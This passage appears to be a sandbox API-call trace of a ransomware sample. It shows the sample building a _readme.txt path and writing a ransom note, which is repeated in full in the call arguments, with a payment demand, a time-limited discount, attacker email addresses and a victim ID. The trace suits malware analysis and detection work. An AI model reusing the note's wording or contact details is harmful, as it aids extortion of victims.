lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.131] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.131] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.131] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0056.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.131] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0056.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.132] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.132] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.132] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.132] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.133] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.133] CloseHandle (hObject=0x5c8) returned 1 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.134] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.134] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.134] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.134] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.134] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.134] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.134] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.134] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.135] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.138] HeapFree 